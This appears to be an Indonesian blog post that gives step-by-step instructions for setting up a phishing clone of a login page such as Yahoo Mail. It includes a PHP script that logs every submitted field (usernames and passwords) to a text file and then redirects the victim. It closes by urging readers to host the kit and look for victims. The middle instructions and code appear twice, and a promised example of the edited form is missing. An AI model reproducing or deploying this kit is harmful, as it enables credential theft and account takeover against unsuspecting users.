Langkah pertama yang dilakukan adalah masuk ke halaman login situs yang menjadi target misalnya yahoo mail. Save Page As (default untuk firefox) atau simpan seluruh halaman secara komplit pada sebuah folder terpisah (misalkan beri nama folder mail). Kamu akan mendapatkan satu buah file html dan sebuah folder yang berisi image dan file lainya. Nah selanjutnya ganti nama file HTML menjadi index.html
Masih pada folder yang sama, buat sebuah file baru dan beri nama serial.txt. Kemudian buah sebuah file php dengan code script di bawah ini. Kemudian Simpan dengan nama login.php. Pastikan kode warna merah diganti dengan nama domain tempat penyimpanan file fake login tersebut.
Header("Location: http://nama-domain.com");
$handle = fopen("serial.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Langkah berikutnya adalah buka file index.html yang tadi menggunakan text editor. Kemudian cari code yang mengarahkan Form login biasanya diindikasikan dengan nama Kemudian ganti action ke file login.php yang telah dibuat dan ganti method menjadi GET. Kira-kira hasilnya menjadi seperti ini:
Jika sudah, upload semua file tersebut kedalam hosting kamu sendiri dan mulailah mencari target phising sebagai korban pertama anda.. ha3x... Selamat Mencoba
Masih pada folder yang sama, buat sebuah file baru dan beri nama serial.txt. Kemudian buah sebuah file php dengan code script di bawah ini. Kemudian Simpan dengan nama login.php. Pastikan kode warna merah diganti dengan nama domain tempat penyimpanan file fake login tersebut.
Header("Location: http://nama-domain.com");
$handle = fopen("serial.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Langkah berikutnya adalah buka file index.html yang tadi menggunakan text editor. Kemudian cari code yang mengarahkan Form login biasanya diindikasikan dengan nama Kemudian ganti action ke file login.php yang telah dibuat dan ganti method menjadi GET. Kira-kira hasilnya menjadi seperti ini:
Jika sudah, upload semua file tersebut kedalam hosting kamu sendiri dan mulailah mencari target phising sebagai korban pertama anda.. ha3x... Selamat Mencoba
Tidak ada komentar:
Posting Komentar